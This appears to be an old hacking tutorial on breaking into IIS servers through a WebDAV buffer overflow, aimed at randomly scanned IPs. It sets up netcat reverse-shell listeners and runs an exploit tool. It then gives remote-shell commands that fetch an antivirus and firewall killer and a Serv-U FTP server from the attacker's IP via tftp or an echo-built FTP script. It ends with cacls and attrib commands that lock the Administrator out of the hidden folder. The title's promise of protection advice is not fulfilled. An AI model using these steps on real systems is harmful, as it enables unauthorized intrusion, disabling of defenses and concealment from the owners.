In this tutorial I?

ll explain how to hack a WebDAV vulnerable server, and how t

o protect it.
Programs You need:
Servu tools: you can download yourself
Netcat
xwbf-v0.3
Tftp
Virus / Firewall killer
start a dos window.
start you do up and go the folder with nc.exe now give the follow command:
nc -L -vv -p 666
and start another dos window
and do :
nc -L -vv -p 667
K if you done that you will see something like this:
F:\>nc -L -vv -p 666
listening on [any] 666 ...
You have just successfully run NetCat. It is now listening and waiting to be cha
nged in a reverse command line (command line on other computer)
Start the program: xwbf-v0.3 and fill in the following:
Target : the IP from your scan
Port : 80
Satan?s IP : Your IP.
Port : 666
Custom Pads : (use default)
Padding : (use default)
Now all you need is a scan,
Pick a random IP and enter it into the program. Click on EXPLOIT. You should eit
her see :
Checking ntdll.dll buffer overflow .....CONNECTED
sending evil buffer ......VULNERABLE
Connecting to 'xxx.xxx.39.159' .........CONNECTED
trying ret addr 0x00d000d0 ......DONE
Waiting for IIS to restart .........CONNECTED
trying ret addr 0x00d100d1
or
Checking ntdll.dll buffer overflow .....CONNECTED
sending evil buffer ...... NOT VULNERABLE
If it?s vulnerable the program will start checking exploit addresses, when it ge
t?s acces differs from system to system..
After a while NC.exe should display a CMD window. You now have succesfuly infilt
rated the system and can choose between TFTP and ECHO hacking.
create your own dir like : mkdir c:\winnt\system32\drivers\dll\
First Tftp:
Start the program and push browse and select your dir with the files.
then go to the remote shell and do:
tftp.exe -i YOURIP get kill.bat c:\Winnt\system32\drivers\dll\kill.bat
Navigate to your dir using the simple DOS command :
cd C:\Winnt\system32\drivers\dll\
Now run KILL.BAT. It will start to disable any virusscanners or firewalls.
When it?s finished we?ll upload the rest of the files :
tftp.exe -i YOURIP get drvrquery32.exe c:\Winnt\system32\drivers\dll\servudaemon
.exe (I recommend you change the name to sth else.)
tftp.exe -i YOURIP get drvrquery32.exe c:\Winnt\system32\drivers\dll\servudaemon
.ini
When TFTP has finished transferring the files do the following command.
servudaemon.exe /i /s /h
And after that we are going to run the stro by simply using :
Net start servu
You can now login to your stro with the desired username and password you specif
ied.
Second method: Echo Hacking
For this you need a seed stro, to transfer the files from.
do this commands:
echo open ipserver portserver >> c:\winnt\system32\drivers\dll\1.txt
echo user user >> c:\winnt\system32\drivers\dll\1.txt
echo password >> c:\winnt\system32\drivers\dll\1.txt
echo lcd c:\winnt\system32\drivers\dll >> c:\winnt\system32\drivers\dll\1.txt
echo get CommonDlg32.dll >> c:\winnt\system32\drivers\dll\1.txt
echo get drvrquery32.exe >> c:\winnt\system32\drivers\dll\1.txt
echo quit >> c:\winnt\system32\drivers\dll\1.txt
ftp -i -n -v -s:c:\winnt\system32\drivers\dll\1.txt
After doing the FTP command, it will start transferring the files from the stro
to your target.
What you just did with the command above is the following. You ?echoed? commands
into a txt file. Then you use FTP to open the txt file and execute it?s content
.
The hack is almost done, only the final step to protect the dir from the admin.
do this:
cacls c:\winnt\system32\drivers\dll\* /T /E /P Administrator:N
attrib +S +H c:\winnt\system32\drivers\dll\ /S /D
if that one not work do
attrib +S +H c:\winnt\system32\drivers\dll\
Now the admin can't see in the dir anymore
Enjoy Your WebDAV Hack!